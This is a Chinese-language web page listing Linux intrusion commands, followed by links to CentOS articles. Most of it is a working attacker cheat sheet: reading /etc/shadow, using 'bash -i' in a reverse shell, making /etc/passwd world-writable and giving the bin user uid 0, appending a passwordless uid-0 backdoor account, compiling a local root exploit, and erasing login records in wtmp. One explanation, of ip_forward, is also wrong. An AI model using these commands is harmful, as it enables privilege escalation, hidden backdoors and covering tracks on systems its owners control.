不得不看:Linux入侵常用命令總結
cat /etc/shadow 查看用戶密碼需要root權限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網卡號 查看所在網卡的ip信息
ifconfig 查看本機ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當你以普通限權用戶身份進入的時候,一般你會有一個類似bash$的prompt。當你以Root登陸時,你的prompt會變成
bash#。
系統變量 : 試著echo “$USER / $EUID” 系統應該會告訴你它認為你是什么用戶。
echo 1》/proc/sys/net/ipv4/if_forward是不是你寫錯了,應該是echo 1》/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默認是0,也就是內核不進行數據包過濾,改為1 ,讓內核對數據包進行filter處理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看運行服務
lsb_release -a 查看系統版本
重啟ssh服務 :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠程ssh才可登錄
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務端,如果關閉,則不能打開。
su的菜鳥用法
先chomod 777 /etc/passwd
然后修改bin用戶的gid和uid為0
然后passwd設置bin的密碼
然后cp /bin/bash /sbin/nologin
然后su的時候su - bin就可以到rootshell了。
這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo “nosec:x:0:0::/:/bin/sh” 》》 /etc/passwd
echo “nosec::-1:-1:-1:-1:-1:-1:500” 》》 /etc/shadow
清空last記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大文件在利用Linux Kernel 《= 2.6.17.4 (proc) Local Root Exploit提權的時候要用到的。
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解